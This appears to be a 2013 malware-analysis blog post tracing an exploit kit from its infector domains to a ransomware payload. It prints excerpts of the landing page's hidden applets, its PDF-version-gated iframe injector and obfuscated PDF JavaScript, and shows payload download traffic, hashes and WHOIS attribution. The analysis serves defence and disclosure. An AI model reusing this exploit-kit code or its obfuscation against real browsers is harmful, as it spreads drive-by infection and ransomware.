The investigation was done two days in a row, scattered in our twitter for there are only some minutes to do it within daily work, by some request I dare myself to gather the documentations & put into this post. So here we go!
It starts with the two infector urls pointed to IP 217.23.6.57 below:#MalwareMustDie!afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070 davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070These are possibility of domain names used for this EK infector:hhmarshall1971.net marshallfred26.net afgarcia67.net martinkashley87.net davidsonfrc89.net rosettasgiantonio9.netWe fetch it as per below:=> `lavaafly.php@janeoleg=875070' Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57 Caching davidsonfrc89.net => 217.23.6.57 Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected. : GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0 User-Agent: #MalwareMustDie Playing with your jars Accept: */* Host: davidsonfrc89.net Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 08 Jan 2013 07:30:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive : 200 OK URI content encoding = `UTF-8' Length: unspecified [text/html] Saving to: `lavaafly.php?janeoleg=875070' 2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]Ending up with the landing page of this exploit kit. We neutralized the code here for analysis purpose -->>[PASTEBIN]Landing Page Script Structure
As always we mentioned, it's important to recognize the structure of a landing-page's script. The current one is like the below formats:// first applet with jar download.. <applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1"> <param name="bhjwfffiorjwe" value="0jfX19NXhX1...CgjC0.Ch3B2lCjZdp"> </applet> // second applet with jar download.. <applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1"> <param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt.../hkgjNZVkgp"> </applet> // some html.. <html><body></body> //a customized plugindetect script contains "actojack"pdf for exploit.. <script type="text/javascript"> var actojack= { version:"ruptable",name:"actojack",handler:function(c,b,a) { return function() { c(b,a) } } ,isDefined:function(b) { return typeof b!="undefined" : : pdfver = actojack.getVersion("AdobeReader"); if (typeof pdfver == "string") { pdfver = pdfver.split(","); pdfver[3] = pdfver[3].substring(0, 1); pdfver = parseInt(pdfver.join(""), 10); } else { pdfver = 0; } function ifr(abc) {var dh = document.createElement("iframe"); dh.setAttribute("width", 1); dh.setAttribute("height", 1); dh.setAttribute("src", abc); document.body.appendChild(dh); }; function pdf() { try { if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)) { ifr("lacecape.php"); } } catch(e) { } } setTimeout(pdf,2110);There are a PDF for exploit & two JAR download infector files in the landing-page, no obfuscation used, just a condensed/compressed code used.PDF Exploit
Here's the function for downloading PDF via IFRAME:: function ifr(abc) { var dh = document.createElement("iframe"); dh.setAttribute("width", 1); dh.setAttribute("height", 1); dh.setAttribute("src", abc); document.body.appendChild(dh); }; :It was called by the function pdf() below:function pdf() { try { if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)) { ifr("lacecape.php");The download PDF path is a self explanatory in the code, go figure :-) These both functions are located in the end of the script. The PDF itsef has the script in the address 0x415-0x144A , with the structure below:// variable settings.. ozsmpkoqb="affsdfsa"; var oazgntrlz = "tw%kf"; ivtwcjqa=event.target; vjbvirqrz=this.w[ivtwcjqa.info.Date]; //obfuscation pattern under a string in a function... function cskfhyrah(){return("q1ggh55jre..jre0Aq1ggh55jre7Dq1ggh55jre0A")} //deobfuscation generator... vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));"); bpzritaa=ddyoxazmq; vjbvirqrz(unescape(bpzritaa)); /*----end of structure----*/ // additional: obfuscation pattern : q1ggh55jre2Bq1ggh55jre58q1ggh55jre6Eq1ggh55jre51q1ggh55jre h55jre42q1ggh55jre63q1ggh55jre69q1ggh55jre2Fq1ggh55jre76q1 re37q1ggh55jre79q1ggh55jre35q1ggh55jre76q1ggh55jre4Cq1ggh5 q1ggh55jre38q1ggh55jre37q1ggh55jre2Bq1ggh55jre74q1ggh55jre h55jre62q1ggh55jre49q1ggh55jre43q1ggh55jre36q1ggh55jre77q1 re4Dq1ggh55jre6Dq1ggh55jre69q1ggh55jre56q1ggh55jre77q1ggh5 q1ggh55jre2Bq1ggh55jre76q1ggh55jre4Cq1ggh55jre7Aq1ggh55jre h55jre4Bq1ggh55jre6Cq1ggh55jre63q1ggh55jre34q1ggh55jre36q1Noted the obfuscation under a function to avoid automation, and the obfs pattern contain repetition of "q1ggh55jre" strings. The first decoding key is using the line provided in he script below:vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");Which will burp you the other obfs script, if you runs it down you'll see strings below:gwvtcewuw = "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJC.. QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC.. QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC.. QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC.. QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC.. : xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8 Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy 86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbI C6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmuj XzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc4 64181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO72 8vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4z HLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX :↑The string contains the exploit and shellcode infector. We manually decoded this PDF infector here -->>[PASTEBIN] By the way it exploits, we recognize that LibTIFF CVE-2010-0188 is used. The PoC of malware download via this infector PDF:GET /Jdowu32ds2s/janudent.php HTTP/1.1 User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_04 Host: davidsonfrc89.net : HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Mon, 07 Jan 2013 07:13:48 GMT Content-Type: application/x-msdownload Content-Length: 81136 Connection: keep-alive Pragma: public Expires: Mon, 07 Jan 2013 07:13:48 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="0959c.exe" Content-Transfer-Encoding: binary MZ......................@........................ .......................!..L.!This program cannot be run in DOS mode.The JAR Exploits
Two applets was detected at the head of the landing-page's code:<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1"> <param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp"> </applet> <applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1"> <param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp"> </applet>We'll see two downloadable paths & fecth them:GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0 : HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 08 Jan 2013 09:32:58 GMT Content-Type: application/x-java-archive Content-Length: 9465 Connection: keep-alive Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT ETag: "39a0afc-24f9-4d2101e35e1c0" Accept-Ranges: bytes : 200 OK Length: 9,465 (9.2K) [application/x-java-archive] 18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465] GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0 : HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 08 Jan 2013 09:36:01 GMT Content-Type: application/x-java-archive Content-Length: 5502 Connection: keep-alive Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT ETag: "39a0afd-157e-4d1a6f66da600" Accept-Ranges: bytes : 200 OK Length: 5,502 (5.4K) [application/x-java-archive] 18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]These jars contains exploits of CVE-2012-1723 & CVE-2012-5076. The complete JARs exploit analysis guide is in here --->>[PASTEBIN]Payload
Through the infection of this landing page you'll get exploited by either PDF or JARs and get same payload as per below PDF network traffic as evidence;HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Mon, 07 Jan 2013 07:13:48 GMT Content-Type: application/x-msdownload Content-Length: 81136 Connection: keep-alive Pragma: public Expires: Mon, 07 Jan 2013 07:13:48 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="0959c.exe" Content-Transfer-Encoding: binary MZ......................@........................ .......................!..L.!This program cannot be run in DOS mode. $.........;<..Uo..Uo..Uo..Fo..Uo.[.o..Uo..To!.Uo..Uo..Uo...o..Uo...o.. Uo...o..UoRich..Uo........................PE..L...LL.P................ . ..........p. :It is a PE binary file
Sections: .text 0x1000 0x1e5a 8192 .data 0x3000 0x7a14 31232 .rsrc 0xb000 0x66d8 26624 .reloc 0x12000 0x380 1024 Compilation timedatestamp.....: 2013-01-05 15:52:44 Target machine................: 0x14C (Intel 386 or later processors and compatible processors) Entry point address...........: 0x00001B70 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 C6 FC 3B 3C 82 9D 55 6F 82 9D 55 6F 82 9D 55 6F ..;<..Uo..Uo..Uo 0090 0C 82 46 6F 81 9D 55 6F A5 5B 2E 6F 8D 9D 55 6F ..Fo..Uo.[.o..Uo 00A0 82 9D 54 6F 21 9D 55 6F 82 9D 55 6F 83 9D 55 6F ..To!.Uo..Uo..Uo 00B0 9C CF D6 6F 83 9D 55 6F 9C CF C1 6F 83 9D 55 6F ...o..Uo...o..Uo 00C0 9C CF C4 6F 83 9D 55 6F 52 69 63 68 82 9D 55 6F ...o..UoRich..Uo 00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00E0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L... 00F0 4C 4C E8 50 00 00 00 00 00 00 00 00 E0 00 02 01 LL.P............ : :↑hello Ransomware! Please be careful if you test this sample.. If we check itto Virus Total further:SHA256: 57d2f97502f161d290e6300c74b36ba1c7e0de914fc7d6dec4e55d763841be2f SHA1: 311360a772cdcd942f3fc7696e739e941be5d4ec MD5: fba8bbf5b9a6079ace6621b879aec31a File size: 79.2 KB ( 81136 bytes ) File name: ifgxpers.exevr File type: Win32 EXE Tags: peexe Detection ratio: 10 / 44 Analysis date: 2013-01-07 23:11:44 UTC ( 1 day, 11 hours ago ) URL -->>[VirusTotal]With Malware names:DrWeb : Trojan.MulDrop4.20350 TrendMicro : HS_RANSDIGI.SM TrendMicro-HouseCall : TROJ_GEN.F47V0107 Emsisoft : Trojan.Win32.Agent.AMN (A) Kaspersky : Trojan-Ransom.Win32.Blocker.agrk Malwarebytes : Trojan.FakeMS ViRobot : Trojan.Win32.A.Blocker.81136 Panda : Trj/Ransom.AB SUPERAntiSpyware : Trojan.Agent/Gen-Kryptic Comodo : TrojWare.Win32.Trojan.Agent.GenResearch & Samples
The samples & captures data are shared here --->>[MEDIAFIRE] Pic of the materials shared in this analysis:Virus Total Detection Ratio of Overall Samples (Click the Ratio for details)
File's Time-Stamp Size Name Ratio MD5 ------------------------------------------------------------------------------ 2013/01/09 19:08 81,136 0959c.exe VT(23/46) fba8bbf5b9a6079ace6621b879aec31a 2013/01/08 15:25 5,612 janudent.pdf VT(7/46) ed7c9c976ac0f3399c6928ddad43b739 2012/12/30 20:22 9,465 jimmdemy.jar VT(7/46) be2bcd6c3f2aee6432358e1fb37a8dc2 2012/12/25 14:55 5,502 torylane.jar VT(1/46) ae66fc69244abec22f20384356806ad2 2013/01/08 16:30 29,766 lavaafly.php VT(1/46) 6305989da0c9ac0f4c1fd138b22d634eSome crime investigation & evidence
We're sure that the person behind this ID: davidsonfrc89@yahoo.com is responsible.> davidsonfrc89.net Server: google-public-dns-a.google.com Address: 8.8.8.8 davidsonfrc89.net primary name server = ns1.topdns.me responsible mail addr = davidsonfrc89@yahoo.com serial = 1357651830 refresh = 10800 (3 hours) retry = 3600 (1 hour) expire = 432000 (5 days) default TTL = 38400 (10 hours 40 mins) davidsonfrc89.net nameserver = ns1.topdns.me davidsonfrc89.net nameserver = ns2.topdns.me davidsonfrc89.net internet address = 217.23.6.56 > > > afgarcia67.net Server: google-public-dns-a.google.com Address: 8.8.8.8 afgarcia67.net primary name server = ns1.topdns.me responsible mail addr = davidsonfrc89@yahoo.com serial = 1357651830 refresh = 10800 (3 hours) retry = 3600 (1 hour) expire = 432000 (5 days) default TTL = 38400 (10 hours 40 mins) afgarcia67.net nameserver = ns1.topdns.me afgarcia67.net nameserver = ns2.topdns.me afgarcia67.net internet address = 217.23.6.56Good Reference of the Impact Exploit Kit
(Click the number to jump to reference page)
